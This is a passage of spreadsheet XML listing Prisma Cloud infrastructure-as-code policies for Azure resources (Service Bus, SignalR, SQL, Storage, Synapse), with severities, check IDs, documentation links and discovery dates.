          <t>6e054b96-c87a-4546-8593-f4c3d466d6b5</t>
        </is>
      </c>
      <c r="AI930" t="inlineStr"/>
      <c r="AJ930" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK930" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" t="inlineStr"/>
      <c r="B931" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C931" s="2" t="inlineStr"/>
      <c r="D931" t="inlineStr"/>
      <c r="E931" t="inlineStr"/>
      <c r="F931" t="inlineStr"/>
      <c r="G931" t="b">
        <v>1</v>
      </c>
      <c r="H9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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J931" t="inlineStr">
        <is>
          <t>IaC:General:azure-servicebus</t>
        </is>
      </c>
      <c r="K931" t="inlineStr">
        <is>
          <t>Azure Service Bus Doesn't Use Double Encryption</t>
        </is>
      </c>
      <c r="L931" t="inlineStr"/>
      <c r="M931" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N931" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O931" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P931" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q931" t="inlineStr"/>
      <c r="R931" t="inlineStr"/>
      <c r="S931" t="inlineStr"/>
      <c r="T931" t="b">
        <v>0</v>
      </c>
      <c r="U931" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V931" t="inlineStr">
        <is>
          <t>IaC:General:azure-servicebus-namespace</t>
        </is>
      </c>
      <c r="W931" t="inlineStr">
        <is>
          <t>Ensure that Azure Service Bus uses double encryption</t>
        </is>
      </c>
      <c r="X931" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-199</t>
        </is>
      </c>
      <c r="Y931" t="inlineStr"/>
      <c r="Z931" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_servicebus_namespace"]}</t>
        </is>
      </c>
      <c r="AA931" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB931" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC931" t="inlineStr">
        <is>
          <t>CKV_AZURE_199</t>
        </is>
      </c>
      <c r="AD931" t="b">
        <v>1</v>
      </c>
      <c r="AE931" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF931" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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1" t="inlineStr">
        <is>
          <t>4d477575-ab03-4ad2-a406-2b13c91e89b9</t>
        </is>
      </c>
      <c r="AI931" t="inlineStr"/>
      <c r="AJ931" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK931" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" t="inlineStr"/>
      <c r="B932" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C932" s="2" t="inlineStr"/>
      <c r="D932" t="inlineStr"/>
      <c r="E932" t="inlineStr"/>
      <c r="F932" t="inlineStr"/>
      <c r="G932" t="b">
        <v>1</v>
      </c>
      <c r="H9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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J932" t="inlineStr">
        <is>
          <t>IaC:General:azure-servicebus</t>
        </is>
      </c>
      <c r="K932" t="inlineStr">
        <is>
          <t>Azure Service Bus Doesn't Use Customer-Managed Key Encryption</t>
        </is>
      </c>
      <c r="L932" t="inlineStr"/>
      <c r="M932" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N932" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O932" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P932" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q932" t="inlineStr"/>
      <c r="R932" t="inlineStr"/>
      <c r="S932" t="inlineStr"/>
      <c r="T932" t="b">
        <v>0</v>
      </c>
      <c r="U932" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V932" t="inlineStr">
        <is>
          <t>IaC:General:azure-servicebus-namespace</t>
        </is>
      </c>
      <c r="W932" t="inlineStr">
        <is>
          <t>Ensure that Azure Service Bus uses a customer-managed key to encrypt data</t>
        </is>
      </c>
      <c r="X932" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-201</t>
        </is>
      </c>
      <c r="Y932" t="inlineStr"/>
      <c r="Z932" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_servicebus_namespace"]}</t>
        </is>
      </c>
      <c r="AA932" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB932" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC932" t="inlineStr">
        <is>
          <t>CKV_AZURE_201</t>
        </is>
      </c>
      <c r="AD932" t="b">
        <v>1</v>
      </c>
      <c r="AE932" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF932" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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2" t="inlineStr">
        <is>
          <t>4802ae23-097f-49c9-a96e-331da5ba85bb</t>
        </is>
      </c>
      <c r="AI932" t="inlineStr"/>
      <c r="AJ932" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK932" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" t="inlineStr"/>
      <c r="B933" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C933" s="2" t="inlineStr"/>
      <c r="D933" t="inlineStr"/>
      <c r="E933" t="inlineStr"/>
      <c r="F933" t="inlineStr"/>
      <c r="G933" t="b">
        <v>1</v>
      </c>
      <c r="H9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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J933" t="inlineStr">
        <is>
          <t>IaC:General:azure-signalr</t>
        </is>
      </c>
      <c r="K933" t="inlineStr">
        <is>
          <t>Azure SignalR Service not Using Paid SKU for its SLA</t>
        </is>
      </c>
      <c r="L933" t="inlineStr"/>
      <c r="M933" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N933" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O933" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P933" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q933" t="inlineStr"/>
      <c r="R933" t="inlineStr"/>
      <c r="S933" t="inlineStr"/>
      <c r="T933" t="b">
        <v>0</v>
      </c>
      <c r="U933" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V933" t="inlineStr">
        <is>
          <t>IaC:General:azure-signalr-service</t>
        </is>
      </c>
      <c r="W933" t="inlineStr">
        <is>
          <t>Ensure that SignalR uses a Paid Sku for its SLA</t>
        </is>
      </c>
      <c r="X933" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-196</t>
        </is>
      </c>
      <c r="Y933" t="inlineStr"/>
      <c r="Z933" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_signalr_service"]}</t>
        </is>
      </c>
      <c r="AA933" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB933" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC933" t="inlineStr">
        <is>
          <t>CKV_AZURE_196</t>
        </is>
      </c>
      <c r="AD933" t="b">
        <v>1</v>
      </c>
      <c r="AE933" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF933" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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3" t="inlineStr">
        <is>
          <t>5a2a53dc-38b2-4649-99d5-c117052fcaf7</t>
        </is>
      </c>
      <c r="AI933" t="inlineStr"/>
      <c r="AJ933" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK933" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" t="inlineStr"/>
      <c r="B934" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C934" s="2" t="inlineStr"/>
      <c r="D934" t="inlineStr"/>
      <c r="E934" t="inlineStr"/>
      <c r="F934" t="inlineStr"/>
      <c r="G934" t="b">
        <v>1</v>
      </c>
      <c r="H9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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J934" t="inlineStr">
        <is>
          <t>IaC:General:azure-sql</t>
        </is>
      </c>
      <c r="K934" t="inlineStr">
        <is>
          <t>Azure SQL servers which doesn't have Azure Active Directory admin configured</t>
        </is>
      </c>
      <c r="L934" t="inlineStr"/>
      <c r="M934" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N934" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O934" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P934" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q934" t="inlineStr"/>
      <c r="R934" t="inlineStr"/>
      <c r="S934" t="inlineStr"/>
      <c r="T934" t="b">
        <v>0</v>
      </c>
      <c r="U934" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V934" t="inlineStr">
        <is>
          <t>IaC:General:azure-sql-server</t>
        </is>
      </c>
      <c r="W934" t="inlineStr">
        <is>
          <t>Ensure that Azure Active Directory Admin is configured</t>
        </is>
      </c>
      <c r="X934" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-active-directory-admin-is-configured</t>
        </is>
      </c>
      <c r="Y934" t="inlineStr"/>
      <c r="Z934" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_sql_server"]}</t>
        </is>
      </c>
      <c r="AA934" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB934" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC934" t="inlineStr">
        <is>
          <t>CKV2_AZURE_7</t>
        </is>
      </c>
      <c r="AD934" t="b">
        <v>1</v>
      </c>
      <c r="AE934" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF934" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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4" t="inlineStr">
        <is>
          <t>22c0440e-dadc-4368-ac9a-404edc6417cd</t>
        </is>
      </c>
      <c r="AI934" t="inlineStr"/>
      <c r="AJ934" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK934" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" t="inlineStr"/>
      <c r="B935" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C935" s="2" t="inlineStr"/>
      <c r="D935" t="inlineStr"/>
      <c r="E935" t="inlineStr"/>
      <c r="F935" t="inlineStr"/>
      <c r="G935" t="b">
        <v>1</v>
      </c>
      <c r="H9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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J935" t="inlineStr">
        <is>
          <t>IaC:General:azure-storage</t>
        </is>
      </c>
      <c r="K935" t="inlineStr">
        <is>
          <t>Azure storage account logging for queues is disabled</t>
        </is>
      </c>
      <c r="L935" t="inlineStr"/>
      <c r="M935" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N935" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O935" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P935" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q935" t="inlineStr"/>
      <c r="R935" t="inlineStr"/>
      <c r="S935" t="inlineStr"/>
      <c r="T935" t="b">
        <v>0</v>
      </c>
      <c r="U935" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V935" t="inlineStr">
        <is>
          <t>IaC:General:azure-storage-account</t>
        </is>
      </c>
      <c r="W935" t="inlineStr">
        <is>
          <t>Ensure Storage logging is enabled for Queue service for read, write and delete requests</t>
        </is>
      </c>
      <c r="X935" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/enable-requests-on-storage-logging-for-queue-service</t>
        </is>
      </c>
      <c r="Y935" t="inlineStr"/>
      <c r="Z935" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA935" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB935" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC935" t="inlineStr">
        <is>
          <t>CKV_AZURE_33</t>
        </is>
      </c>
      <c r="AD935" t="b">
        <v>1</v>
      </c>
      <c r="AE935" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF935" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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5" t="inlineStr">
        <is>
          <t>aaf1da86-8a14-41ba-bb75-55c192f5e0d4</t>
        </is>
      </c>
      <c r="AI935" t="inlineStr"/>
      <c r="AJ935" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK935" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" t="inlineStr"/>
      <c r="B936" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C936" s="2" t="inlineStr"/>
      <c r="D936" t="inlineStr"/>
      <c r="E936" t="inlineStr"/>
      <c r="F936" t="inlineStr"/>
      <c r="G936" t="b">
        <v>1</v>
      </c>
      <c r="H9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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J936" t="inlineStr">
        <is>
          <t>IaC:General:azure-storage</t>
        </is>
      </c>
      <c r="K936" t="inlineStr">
        <is>
          <t>Azure Storage Accounts Without Proper Replication</t>
        </is>
      </c>
      <c r="L936" t="inlineStr"/>
      <c r="M936" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N936" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O936" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P936" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q936" t="inlineStr"/>
      <c r="R936" t="inlineStr"/>
      <c r="S936" t="inlineStr"/>
      <c r="T936" t="b">
        <v>0</v>
      </c>
      <c r="U936" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V936" t="inlineStr">
        <is>
          <t>IaC:General:azure-storage-account</t>
        </is>
      </c>
      <c r="W936" t="inlineStr">
        <is>
          <t>Ensure that Storage Accounts use replication</t>
        </is>
      </c>
      <c r="X936" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-206</t>
        </is>
      </c>
      <c r="Y936" t="inlineStr"/>
      <c r="Z936" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA936" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB936" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC936" t="inlineStr">
        <is>
          <t>CKV_AZURE_206</t>
        </is>
      </c>
      <c r="AD936" t="b">
        <v>1</v>
      </c>
      <c r="AE936" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF936" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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6" t="inlineStr">
        <is>
          <t>4434ebc4-9580-410d-9409-9cbedc070e7e</t>
        </is>
      </c>
      <c r="AI936" t="inlineStr"/>
      <c r="AJ936" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK936" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" t="inlineStr"/>
      <c r="B937" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C937" s="2" t="inlineStr"/>
      <c r="D937" t="inlineStr"/>
      <c r="E937" t="inlineStr"/>
      <c r="F937" t="inlineStr"/>
      <c r="G937" t="b">
        <v>1</v>
      </c>
      <c r="H9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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J937" t="inlineStr">
        <is>
          <t>IaC:General:azure-storage</t>
        </is>
      </c>
      <c r="K937" t="inlineStr">
        <is>
          <t>Storage for critical data are not encrypted with Customer Managed Key</t>
        </is>
      </c>
      <c r="L937" t="inlineStr"/>
      <c r="M937" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N937" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O937" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P937" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q937" t="inlineStr"/>
      <c r="R937" t="inlineStr"/>
      <c r="S937" t="inlineStr"/>
      <c r="T937" t="b">
        <v>0</v>
      </c>
      <c r="U937" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V937" t="inlineStr">
        <is>
          <t>IaC:General:azure-storage-account</t>
        </is>
      </c>
      <c r="W937" t="inlineStr">
        <is>
          <t>Ensure storage for critical data are encrypted with Customer Managed Key</t>
        </is>
      </c>
      <c r="X937" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-storage-for-critical-data-are-encrypted-with-customer-managed-key</t>
        </is>
      </c>
      <c r="Y937" t="inlineStr"/>
      <c r="Z937" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA937" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB937" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC937" t="inlineStr">
        <is>
          <t>CKV2_AZURE_1</t>
        </is>
      </c>
      <c r="AD937" t="b">
        <v>1</v>
      </c>
      <c r="AE937" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF937" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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7" t="inlineStr">
        <is>
          <t>03752d85-99fb-4972-87b7-7d10db4cfd59</t>
        </is>
      </c>
      <c r="AI937" t="inlineStr"/>
      <c r="AJ937" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK937" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" t="inlineStr"/>
      <c r="B938" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C938" s="2" t="inlineStr"/>
      <c r="D938" t="inlineStr"/>
      <c r="E938" t="inlineStr"/>
      <c r="F938" t="inlineStr"/>
      <c r="G938" t="b">
        <v>1</v>
      </c>
      <c r="H9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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J938" t="inlineStr">
        <is>
          <t>IaC:General:azure-storage</t>
        </is>
      </c>
      <c r="K938" t="inlineStr">
        <is>
          <t>Azure Storage account Encryption CMKs Disabled</t>
        </is>
      </c>
      <c r="L938" t="inlineStr"/>
      <c r="M938" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N938" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O938" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P938" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q938" t="inlineStr"/>
      <c r="R938" t="inlineStr"/>
      <c r="S938" t="inlineStr"/>
      <c r="T938" t="b">
        <v>0</v>
      </c>
      <c r="U938" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V938" t="inlineStr">
        <is>
          <t>IaC:General:azure-storage-account-customer-managed-key,azure-storage-account</t>
        </is>
      </c>
      <c r="W938" t="inlineStr">
        <is>
          <t>Ensure that Storage Accounts use customer-managed key for encryption</t>
        </is>
      </c>
      <c r="X938" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-storage-accounts-use-customer-managed-key-for-encryption</t>
        </is>
      </c>
      <c r="Y938" t="inlineStr"/>
      <c r="Z938" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_storage_account_customer_managed_key","azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA938" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB938" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC938" t="inlineStr">
        <is>
          <t>CKV2_AZURE_18</t>
        </is>
      </c>
      <c r="AD938" t="b">
        <v>1</v>
      </c>
      <c r="AE938" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF938" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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8" t="inlineStr">
        <is>
          <t>e5ddf10c-4e61-451b-9df1-d97a948017c3</t>
        </is>
      </c>
      <c r="AI938" t="inlineStr"/>
      <c r="AJ938" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK938" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" t="inlineStr"/>
      <c r="B939" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C939" s="2" t="inlineStr"/>
      <c r="D939" t="inlineStr"/>
      <c r="E939" t="inlineStr"/>
      <c r="F939" t="inlineStr"/>
      <c r="G939" t="b">
        <v>1</v>
      </c>
      <c r="H9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39" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J939" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse</t>
        </is>
      </c>
      <c r="K939" t="inlineStr">
        <is>
          <t>Azure Synapse SQL Pool does not have a security alert policy</t>
        </is>
      </c>
      <c r="L939" t="inlineStr"/>
      <c r="M939" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N939" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O939" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P939" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q939" t="inlineStr"/>
      <c r="R939" t="inlineStr"/>
      <c r="S939" t="inlineStr"/>
      <c r="T939" t="b">
        <v>0</v>
      </c>
      <c r="U939" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V939" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse-sql-pool</t>
        </is>
      </c>
      <c r="W939" t="inlineStr">
        <is>
          <t>Ensure Synapse SQL Pool has a security alert policy</t>
        </is>
      </c>
      <c r="X939" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-51</t>
        </is>
      </c>
      <c r="Y939" t="inlineStr"/>
      <c r="Z939" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_synapse_sql_pool"]}</t>
        </is>
      </c>
      <c r="AA939" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB939" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC939" t="inlineStr">
        <is>
          <t>CKV2_AZURE_51</t>
        </is>
      </c>
      <c r="AD939" t="b">
        <v>1</v>
      </c>
      <c r="AE939" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF939" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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39" t="inlineStr">
        <is>
          <t>1db278f2-6401-401d-95d2-3b8d1db49356</t>
        </is>
      </c>
      <c r="AI939" t="inlineStr"/>
      <c r="AJ939" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK939" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" t="inlineStr"/>
      <c r="B940" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C940" s="2" t="inlineStr"/>
      <c r="D940" t="inlineStr"/>
      <c r="E940" t="inlineStr"/>
      <c r="F940" t="inlineStr"/>
      <c r="G940" t="b">
        <v>1</v>
      </c>
      <c r="H9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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J940" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse</t>
        </is>
      </c>
      <c r="K940" t="inlineStr">
        <is>
          <t>Azure Synapse SQL Pool vulnerability assessment disabled</t>
        </is>
      </c>
      <c r="L940" t="inlineStr"/>
      <c r="M940" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N940" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O940" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P940" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q940" t="inlineStr"/>
      <c r="R940" t="inlineStr"/>
      <c r="S940" t="inlineStr"/>
      <c r="T940" t="b">
        <v>0</v>
      </c>
      <c r="U940" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V940" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse-sql-pool</t>
        </is>
      </c>
      <c r="W940" t="inlineStr">
        <is>
          <t>Ensure Synapse SQL Pool has vulnerability assessment attached</t>
        </is>
      </c>
      <c r="X940" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-52</t>
        </is>
      </c>
      <c r="Y940" t="inlineStr"/>
      <c r="Z940" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_synapse_sql_pool"]}</t>
        </is>
      </c>
      <c r="AA940" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB940" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC940" t="inlineStr">
        <is>
          <t>CKV2_AZURE_52</t>
        </is>
      </c>
      <c r="AD940" t="b">
        <v>1</v>
      </c>
      <c r="AE940" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF940" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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0" t="inlineStr">
        <is>
          <t>b7e5346e-dfec-43ba-956d-9e5f06f1e9d1</t>
        </is>
      </c>
      <c r="AI940" t="inlineStr"/>
      <c r="AJ940" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK940" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" t="inlineStr"/>
      <c r="B941" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C941" s="2" t="inlineStr"/>
      <c r="D941" t="inlineStr"/>
      <c r="E941" t="inlineStr"/>
      <c r="F941" t="inlineStr"/>
      <c r="G941" t="b">
        <v>1</v>
      </c>
      <c r="H9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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J941" t="inlineStr">
        <is>
          <t>IaC:General:azure-synapse</t>
        </is>
      </c>
      <c r="K941" t="inlineStr">
        <is>
          <t>Azure Synapse SQL pool not encrypted</t>
        </is>
